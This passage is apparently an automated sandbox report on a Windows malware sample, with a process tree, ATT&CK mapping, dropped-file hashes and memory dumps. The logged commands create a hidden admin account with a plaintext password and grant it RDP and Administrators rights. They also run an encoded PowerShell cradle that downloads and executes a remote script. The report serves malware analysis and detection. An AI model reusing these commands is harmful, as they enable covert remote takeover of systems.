        PID:3460
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2944
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3368
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:640

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3104

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Nl0BYt1i /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Nl0BYt1i /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Nl0BYt1i /add
    3⤵
    PID:1256

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4412

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
1⤵
PID:3156
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
    3⤵
    PID:4876

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4932
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:4896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2664

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Nl0BYt1i
1⤵
PID:1776
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Nl0BYt1i
  2⤵
  PID:4744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Nl0BYt1i
    3⤵
    PID:1412

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4840
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3288

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3188
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1500

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:400
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES53DD.tmp

Filesize
1KB

MD5
cb44a11993141861dd7450b3b5fdd104

SHA1
93296f0690ada0ce2eafc5c83c85bbfa7ee8030f

SHA256
11cfbcf4a7336012e43dc30a2506e2f7afd5512fab9133915ca2c22412bc4bb1

SHA512
1f18300f085b9e9fa6cf57b8183ea1de5424de232aa275ff6a68bb832e948a03eabe11defe40a94c71666c5a8e4efba958ece0c3a087c6049b2319f8a32705db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_er3dq41e.tvb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iiqhpvco\iiqhpvco.dll

Filesize
3KB

MD5
da8d0825cfbc9aeed68153d00298afd7

SHA1
3f36ed0d7c156f18eec8749123911f0fc50fbb01

SHA256
64fb0a3b7402102f517597a03c86734270c69fd3677f256ecfaa3b3fca173742

SHA512
487a0f9550ecd35186b21d7616a20ff7dca388fdb41d76259b1e46847d2ae18fdafc808946a02c0256345b2249c24a70ac1973e77ec5bcfab5a1b30d558f09d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
4b653b8c50572b3bac76058c88fbfcbc

SHA1
03288b917c0edcc1d31c64f27a41385cb55d45be

SHA256
eae413bb71d8059304690b23fb547af2200f798ef8fb5f95eed6a01da6667254

SHA512
514213ae21006bbbc8e627d35c59380956d3a0f60fd0499161bc447b2e502d84e940e63b699b0fae5a9d090714ffd9fc773ff3fd1e35bde8bb6a3375d4f20454

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
0d0f83d5ab9520975fb786cc54f81ec7

SHA1
031e25f9514a1d59cbad1f88ef478fe06c81aa5d

SHA256
e806a0ea2faaf2bcde0c6be4a4d5408845a8281dfd9d6a2e1058b5343d5ee73e

SHA512
67f4fed564955de95d598d8bdff0ce362fbd8936ea75ece00b36a331658b5f11493b22d8566aefcaf33b644741c8a579eba522f23129ba54af8774a0adb98204

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5381c275c09de4076f00de8b0e323067

SHA1
f5701c9d18ced0eb9c85bbbb390b24b99f0e9938

SHA256
aea5a8b5b709b6d4b4dc492411341d416d02afbd6d9054837051f124163f6702

SHA512
e6765e2cae3e5bbfed7b9924641b4afc2ed4590214a8bf87d01bf995710c036a932edd52d06e5d763f5dd1fe22daee11ede9372dca0946ba4c8d9f8e42179d98

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A21.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iiqhpvco\CSC7CB1CF74119A4EEABEEA38D59A8CC6.TMP

Filesize
652B

MD5
b2bc1bda1ae47489a4439579b349c120

SHA1
f26d608045997c8546162598d14f0867a53439af

SHA256
97d60db8b1b9d70b305af305a0a4643272312d1a7eff7b6f7c229a088bb1f797

SHA512
a17352312347bb63d759edf073a9d690fc64c738434e732a6568fe4985da41961099aa269186097708244471fb0d6f8b76dac18408ac3e7d1309c17e4d563c5f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iiqhpvco\iiqhpvco.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iiqhpvco\iiqhpvco.cmdline

Filesize
369B

MD5
9dad7d432a9f04412a4eacd6463d6f94

SHA1
d0ab71d50bf007144dbc3c08be867669b31cecb5

SHA256
f4330b85a45eeccaad318df1913ab5ee1c92468fd83484634d60cc26829fde9e

SHA512
bf8893b8d4c3c1bc73b3ee04dee762ee1865ca317d139b7ba6072cad45aac6ebe73d9677fcc96f089966ae0cfd95484d5bbbcf006059c62969729ea1277068d5

Download Submit
memory/2224-19-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-145-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-18-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-34-0x000001DFCCBE0000-0x000001DFCCBE8000-memory.dmp

Filesize
32KB

Download
memory/2224-16-0x000001DFCCBF0000-0x000001DFCCC12000-memory.dmp

Filesize
136KB

Download
memory/2224-17-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2224-37-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-38-0x000001DFCD140000-0x000001DFCD2B6000-memory.dmp

Filesize
1.5MB

Download
memory/2224-39-0x000001DFCD4D0000-0x000001DFCD6DA000-memory.dmp

Filesize
2.0MB

Download
memory/2224-81-0x00007FFFD5DA0000-0x00007FFFD5DB9000-memory.dmp

Filesize
100KB

Download
memory/2224-157-0x00007FFFD5DA0000-0x00007FFFD5DB9000-memory.dmp

Filesize
100KB

Download
memory/2224-156-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2224-153-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-150-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-152-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2224-144-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2224-21-0x000001DFCCC20000-0x000001DFCCC30000-memory.dmp

Filesize
64KB

Download
memory/2708-52-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2708-50-0x000001D2C9EA0000-0x000001D2C9EB0000-memory.dmp

Filesize
64KB

Download
memory/2708-51-0x000001D2C9EA0000-0x000001D2C9EB0000-memory.dmp

Filesize
64KB

Download
memory/2708-49-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2956-146-0x000001AAA7800000-0x000001AAA7810000-memory.dmp

Filesize
64KB

Download
memory/2956-149-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/2956-112-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/3572-55-0x000002072E420000-0x000002072E430000-memory.dmp

Filesize
64KB

Download
memory/3572-54-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/3572-56-0x000002072E420000-0x000002072E430000-memory.dmp

Filesize
64KB

Download
memory/3572-66-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/4872-67-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/4872-79-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/4872-78-0x00000163F9BF0000-0x00000163F9C00000-memory.dmp

Filesize
64KB

Download
memory/4872-73-0x00000163F9BF0000-0x00000163F9C00000-memory.dmp

Filesize
64KB

Download
memory/5096-102-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-113-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-80-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-1-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/5096-101-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-53-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download
memory/5096-3-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-4-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-2-0x00000172D75B0000-0x00000172D75C0000-memory.dmp

Filesize
64KB

Download
memory/5096-0-0x00000172D79F0000-0x00000172D7E16000-memory.dmp

Filesize
4.1MB

Download
memory/5096-159-0x00007FFFC7FD0000-0x00007FFFC8A91000-memory.dmp

Filesize
10.8MB

Download